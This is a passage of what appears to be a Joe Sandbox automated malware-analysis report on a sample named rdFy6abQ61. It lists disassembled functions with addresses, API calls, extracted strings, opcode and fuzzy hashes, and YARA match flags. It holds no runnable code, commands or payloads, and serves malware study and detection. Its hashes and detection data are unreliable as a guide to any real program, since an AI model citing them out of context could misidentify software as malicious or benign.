                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: /B$nB
                                                                              • API String ID: 0-3787476056
                                                                              • Opcode ID: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
                                                                              • Instruction ID: 01d0190d3bb0ccc58f1444bdf38ba46b89cc646c5dd88bcfe1081667cb01010c
                                                                              • Opcode Fuzzy Hash: 8cc1b13c1102e30db294b922f2599dfa790129c5d8f004719a222694663e08f2
                                                                              • Instruction Fuzzy Hash: 3E7270B0509B808FD3658F3C8855797BFD5AB5A324F148A5EE0FE873D2C77960018B6A
                                                                              Function 0042BA20 Relevance: 3.1, APIs: 2, Instructions: 146COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0042BB95
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,?,?), ref: 0042BC1E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID:
                                                                              • API String ID: 237503144-0
                                                                              • Opcode ID: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
                                                                              • Instruction ID: 88c8716360a9849faea0ff28cefb8e51f229f873179c28473aebd70c66339d06
                                                                              • Opcode Fuzzy Hash: 08dab3ac1c3e682bcbc351f775dd6a9a04cbb622e72c41a6e431c472b400fc88
                                                                              • Instruction Fuzzy Hash: 28513672519350CFE324CF76DC8075BBBA2FBC2304F16862DE5951B290CBB984068B86
                                                                              Function 00422880 Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !'$27
                                                                              • API String ID: 0-1982139352
                                                                              • Opcode ID: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                                                              • Instruction ID: 5153aecd17f80642fd8c0eece016e91168ea77982d201b76830abc39117f0e9e
                                                                              • Opcode Fuzzy Hash: f59c36ea8d3009de80897bc285a486c4a8992c853654d8c5358ed7f8b9326bec
                                                                              • Instruction Fuzzy Hash: F5C156B57083109BD7149F29DD9276BB7E1EF81314F88852EE8C58B391E6BCD904C35A
                                                                              Function 02102AE7 Relevance: 3.0, Strings: 2, Instructions: 455COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !'$27
                                                                              • API String ID: 0-1982139352
                                                                              • Opcode ID: 12ce45a36756b1f70682f7838d54c29fd27cb533d73a7c0cc1eee0f87610a5d7
                                                                              • Instruction ID: 44d9760ee0d7863342c421682168322dcebdeb2dbf1354964211a67a0877b8d0
                                                                              • Opcode Fuzzy Hash: 12ce45a36756b1f70682f7838d54c29fd27cb533d73a7c0cc1eee0f87610a5d7
                                                                              • Instruction Fuzzy Hash: 90C107B16883008BD7249F28CCD677BB7E2EF85324F19852CE9958B2D0E7B9D905C752
                                                                              Function 00443B60 Relevance: 2.9, Strings: 2, Instructions: 441COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: >D$UUK
                                                                              • API String ID: 0-1347512165
                                                                              • Opcode ID: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
                                                                              • Instruction ID: 5ece47969d2e4495fd744cec34393a228d2be6badad345384a3b8f4f4ab2efe2
                                                                              • Opcode Fuzzy Hash: e0386ec59c16bdf8c29cd5a48f3d704c8f1d2f3bb815fb722162d041929130e6
                                                                              • Instruction Fuzzy Hash: 86D1EE35A08310CFD314DF29D89072BB7E2BBDA300F4A897DE98997392D675D941CB86
                                                                              Function 00429F7C Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ji46$rYaT
                                                                              • API String ID: 0-3893754386
                                                                              • Opcode ID: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
                                                                              • Instruction ID: dcd566aaca25f8eff7100027eceeae2756314058decd7535bc98b9674378a6ea
                                                                              • Opcode Fuzzy Hash: 50b9503766fda6a3b299027e53f19a6ac61b732975699a3fa8b313e916dca586
                                                                              • Instruction Fuzzy Hash: 1BE1F132A08351CFD314CF29D88035AB7E2FFCA324F698A6DE995572A1D734DC158B86
                                                                              Function 004195B6 Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: =$^\
                                                                              • API String ID: 0-3808277151
                                                                              • Opcode ID: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                                                              • Instruction ID: 449fbb577030d5845b3ff3c78ea8df1dbbecff39a5bc4c3e86ed8d0a83d476b4
                                                                              • Opcode Fuzzy Hash: 3ae2f5be3b5b97ffa114b6693e049356c5b1626121661ef7d8dd4ce1dd7da5ce
                                                                              • Instruction Fuzzy Hash: 20B1E6B56483428BD328DF25C8A07ABBBE1EFD5315F08892DE4D58B381E77C8845C796
                                                                              Function 020F981D Relevance: 2.9, Strings: 2, Instructions: 363COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: =$^\
                                                                              • API String ID: 0-3808277151
                                                                              • Opcode ID: 5db4b892f095804ee284d38a4db250eddcc7e3951948645c0765905043076e92
                                                                              • Instruction ID: fb4b6a79ce1ba380699f90b954aceea14d5ebe82467c2e60bfa5748c24ebc7ab
                                                                              • Opcode Fuzzy Hash: 5db4b892f095804ee284d38a4db250eddcc7e3951948645c0765905043076e92
                                                                              • Instruction Fuzzy Hash: 0EB107756483818BC729DF24C890BBBBBE1EFC5315F08896CD4D68BB81E7788845DB52
                                                                              Function 0042F1C1 Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$H
                                                                              • API String ID: 0-1447585844
                                                                              • Opcode ID: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
                                                                              • Instruction ID: 70973cbbd1d345abe4e026803d5a60bd6a74268ec64029004c3dfe15c300f41f
                                                                              • Opcode Fuzzy Hash: c35a03f4cf591df4d4aceba60bc50ce8e51cc17a99ecf9a3f38fb7b5001c7353
                                                                              • Instruction Fuzzy Hash: 80814B716083914FD318CB29C8A136BBBE09FA6304F18996EE5D58B392D67DC806CB56
                                                                              Function 0043025E Relevance: 2.8, Strings: 2, Instructions: 282COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$H
                                                                              • API String ID: 0-1447585844
                                                                              • Opcode ID: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
                                                                              • Instruction ID: 66dbb9f7593940bda3bdb21456c4f2af28ce9aa7ca169eb6b940cdf049e341e0
                                                                              • Opcode Fuzzy Hash: daca0a37e64689617dcb32fcd85fbedc979902d255c1e22abba8b4ae14e2925f
                                                                              • Instruction Fuzzy Hash: 4B814C716083914FD718CB39C8A136BBBE09FA6304F18D96EE5D587382D67DC806CB56
                                                                              Function 004302CD Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6$H
                                                                              • API String ID: 0-1447585844
                                                                              • Opcode ID: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
                                                                              • Instruction ID: c9c02734f3e5a7eb2ca0eed0804f28c87630d1e97fd284b28010db33944d152d
                                                                              • Opcode Fuzzy Hash: b232811d3ee24f42029a39b04350329bbda619cffa72b30ad3cccad91a8d63e0
                                                                              • Instruction Fuzzy Hash: 99816E716083814FD318CB39C8A136BBBE09F96304F18D96EE5D587382D67DC806CB56
                                                                              Function 004123EC Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: n$n
                                                                              • API String ID: 0-3874132673
                                                                              • Opcode ID: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                                              • Instruction ID: 424b4f810cf5c42aa0f11275d2ef5d9a27bebee222b9303fc165311a88e3af60
                                                                              • Opcode Fuzzy Hash: 640065771ea6765fc777ed917390e0c770a06acb5a5701e8f959122f0f1be56b
                                                                              • Instruction Fuzzy Hash: A1A1F676A087508BC3249B3885813AFBBD1AFC5324F198E3EE5E9D33D1DA7888418747
                                                                              Function 020F2653 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: n$n
                                                                              • API String ID: 0-3874132673
                                                                              • Opcode ID: c4005c324171c5f74c8a629180dd734c5e49b29667f7da172a4492617f587dfd
                                                                              • Instruction ID: 349d14bf6d155dfdda7bbb8e43d020e9bf0430734ef7ef19330b06ba2a6990e6
                                                                              • Opcode Fuzzy Hash: c4005c324171c5f74c8a629180dd734c5e49b29667f7da172a4492617f587dfd
                                                                              • Instruction Fuzzy Hash: C0A1D576A097908FC764DB7884803AEBBD1AF85324F198A3DD9D9C77D1D6748841DB02
                                                                              Function 00415DD8 Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7$gfff
                                                                              • API String ID: 0-3777064726
                                                                              • Opcode ID: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
                                                                              • Instruction ID: 4941e5eadb7aba571cda7473ebd939308df881bd2ae5f083bfc9904c5215119c
                                                                              • Opcode Fuzzy Hash: 182f3249541d53321ff3a465a177239aaee99738a326feff563185d87f9bb099
                                                                              • Instruction Fuzzy Hash: 7061F572A446118FE714CF29DC017ABB7E2EBC5314F09C62EE485DB392EB3898458B85
                                                                              Function 020F603F Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7$gfff
                                                                              • API String ID: 0-3777064726
                                                                              • Opcode ID: 6c8c9fb26648e15531b3050723418642d5d2233e69bd9fa0fe755d291b7fc93a
                                                                              • Instruction ID: 1f530d28b8ac34838f09db58c3af5436e454046338050587086f4edd451c62e2
                                                                              • Opcode Fuzzy Hash: 6c8c9fb26648e15531b3050723418642d5d2233e69bd9fa0fe755d291b7fc93a
                                                                              • Instruction Fuzzy Hash: 7D6101726443418FE364CB28CC01B6BB7E6FBC5314F08C62DD595CB691E739840A8B81
                                                                              Function 0210AC89 Relevance: 2.7, Strings: 2, Instructions: 160COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *$*
                                                                              • API String ID: 0-899546507
                                                                              • Opcode ID: f755de3653f2c2b4c58075d169376b9a8ee94269c4aa6d6ea2e771727395f055
                                                                              • Instruction ID: f2dcfb4611cbd1373dcc29fbb8da402024d9acb2715ca0e647a2152ba3c04d44
                                                                              • Opcode Fuzzy Hash: f755de3653f2c2b4c58075d169376b9a8ee94269c4aa6d6ea2e771727395f055
                                                                              • Instruction Fuzzy Hash: 9151A0765083558FD718CF24D45035FBBE1EBC4308F018D2DE9EA9B280DBB899098BC2
                                                                              Function 0043E6E0 Relevance: 2.0, Strings: 1, Instructions: 749COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: XY
                                                                              • API String ID: 0-554446067
                                                                              • Opcode ID: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                                                              • Instruction ID: d641272ad35b4eeebbd9d600f92596cd8dd7c25af792fba6638ab3cd001d37ae
                                                                              • Opcode Fuzzy Hash: 33b58009a0d275d92ce311614dd2e3f5199f03ee560553effbe1cdfd0aaf5a3f
                                                                              • Instruction Fuzzy Hash: 3D322F3AA18351CBC7149F28D91236BB7E1EF8A300F09D97ED4C997291E7B8C945C786
                                                                              Function 0042AF92 Relevance: 2.0, Strings: 1, Instructions: 719COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: q
                                                                              • API String ID: 0-3900047139
                                                                              • Opcode ID: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                                                              • Instruction ID: d2894ee3cd08ac16c3749e12b5b110520c9353356bc4cfd2bf9c021bc54d189f
                                                                              • Opcode Fuzzy Hash: 028d739358c52e8602972a09d323f6bdb4925b84f419e3085169aae73bae586d
                                                                              • Instruction Fuzzy Hash: B522F1B4608311CBD714CF64D8A176BB7F1FF96318F48896DE8854B391E7788906CB8A
                                                                              Function 004324EE Relevance: 1.8, Strings: 1, Instructions: 514COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6
                                                                              • API String ID: 0-498629140
                                                                              • Opcode ID: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
                                                                              • Instruction ID: 787a559d3a6ca89598d2bb367016cd154da02af78fea546a06432564028693a7
                                                                              • Opcode Fuzzy Hash: ac07f149d65fe26ea065e0c1761624a1b626f6eed3cc7614f6515bb7ce6c8acc
                                                                              • Instruction Fuzzy Hash: C3322CB0405B819FD351DF39C545793BFE0AB16214F188A9EE4E9CB383D236E146CBA6
                                                                              Function 00426010 Relevance: 1.7, APIs: 1, Instructions: 205COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
                                                                              • Instruction ID: 5d6f820f76e102683b6000eea9d9c0854d2a53b51ca8dd83b48920ec6b395174
                                                                              • Opcode Fuzzy Hash: 76074d0fa5649b7af8b65c8d834cc8e8b3a426d5c338a204269d4efa35c5c45e
                                                                              • Instruction Fuzzy Hash: 096111716083548FE720CF65D841BEFB7F0FB8A308F10856CE558AB282DB7554068B8A
                                                                              Function 0043DF60 Relevance: 1.6, Strings: 1, Instructions: 391COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NP,?
                                                                              • API String ID: 0-3110377521
                                                                              • Opcode ID: 97dad55d8dd3fc337ded57b92089687e6f60b6a3e62a8a8ad6655724058fe796
                                                                              • Instruction ID: 1f4fb5fde5d3a5e7269753d163d491fe37fce05cbc84d157e3c3b696b68cf536
                                                                              • Opcode Fuzzy Hash: 97dad55d8dd3fc337ded57b92089687e6f60b6a3e62a8a8ad6655724058fe796
                                                                              • Instruction Fuzzy Hash: 4CA148316052009BD714CF16CC81B6BB3A6FBC9314F14962DE9A5573C1D779AC06CB9A
                                                                              Function 0211E1C7 Relevance: 1.6, Strings: 1, Instructions: 391COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: NP,?
                                                                              • API String ID: 0-3110377521
                                                                              • Opcode ID: 1d2be2e89745f1705865aa58f38ac347d87ec7cac21ab51014cd6f937c8c9e72
                                                                              • Instruction ID: d3d272e107f8d6d532e655b1ca3129cc13b028ac259a873cfcfd5fd8ccf56ffe
                                                                              • Opcode Fuzzy Hash: 1d2be2e89745f1705865aa58f38ac347d87ec7cac21ab51014cd6f937c8c9e72
                                                                              • Instruction Fuzzy Hash: D0A105756842009FD728CF55CC81B6BB7A6FF85328F18863CEDA957291E731E805CB92
                                                                              Function 0210AA57 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 0210AB5E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID:
                                                                              • API String ID: 237503144-0
                                                                              • Opcode ID: 01e1882552020fdf3c56b2c86be107ff28e05b2961e87663747131647cbb6fdd
                                                                              • Instruction ID: 2aefa710d57c40bc4f5f307678554a53f96c962bd4bd22ee65321c404e65db03
                                                                              • Opcode Fuzzy Hash: 01e1882552020fdf3c56b2c86be107ff28e05b2961e87663747131647cbb6fdd
                                                                              • Instruction Fuzzy Hash: 034103726583154FD324CF68DDC134BBAE2ABC4704F1AC93DE5988B285DBB4C9058BC2
                                                                              Function 00414C30 Relevance: 1.6, Strings: 1, Instructions: 384COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: "PA
                                                                              • API String ID: 0-2145937358
                                                                              • Opcode ID: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
                                                                              • Instruction ID: f624a7b71cbf7b314e20e1a45d24be04a38f24c047e10d0676dafeec8f7fc991
                                                                              • Opcode Fuzzy Hash: bef77be7770c426e390176cbba11156bb761573cd05d219cd3a7b36ea03102e9
                                                                              • Instruction Fuzzy Hash: 5CA102B15183118BD7189F28D8627ABB3E1EFD2314F09892EE8C58B390F77C9945C796
                                                                              Function 0210BC87 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 0210BDFC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1878435421.00000000020E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_20e0000_rdFy6abQ61.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentExpandStrings
                                                                              • String ID:
                                                                              • API String ID: 237503144-0
                                                                              • Opcode ID: 33f1db717a145ff1562198e7d1e78c7b503345e90291f3797b6fdcaf95dce686
                                                                              • Instruction ID: 7c820c777e54af3c98aaf305338afcd05d863ce38f31e52e66c36897acfcfd8f
                                                                              • Opcode Fuzzy Hash: 33f1db717a145ff1562198e7d1e78c7b503345e90291f3797b6fdcaf95dce686
                                                                              • Instruction Fuzzy Hash: 7341E6B25593508FE314CF36C89074FFAE2FBC1704F168A1DE5951B395CBB995068B82
                                                                              Function 00430F54 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                                                              • Instruction ID: 7b7113e42e32beabe8c4c016577568230ad12c23f9774a4b5fe118adb1295c8a
                                                                              • Opcode Fuzzy Hash: d64d061adfdbf120dee82a0fc1018915ebc31be6462cf1f122b0efd75b845ce0
                                                                              • Instruction Fuzzy Hash: 9531F33691C3D08BE3348F359C553EBBBE2ABC6314F19866DC8D857285DB7A1805CB86
                                                                              Function 00430F4E Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1877992200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1877992200.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_rdFy6abQ61.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                                                              • Instruction ID: fb4d1f38de1a85f36896b77157d4be4448694684cc70b9096da98958b1763f09
                                                                              • Opcode Fuzzy Hash: d43ff3280345835f4c21c516bd395dd340a58cd7044fd3e67ca854e034ba4060
                                                                              • Instruction Fuzzy Hash: D931F23695C3908BE3348F359C953DBBBE2ABC6314F19862DC8D817284DB7A1805CB86
                                                                              Function 004085B0 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                              Download Yara Rule
                                                                              Strings
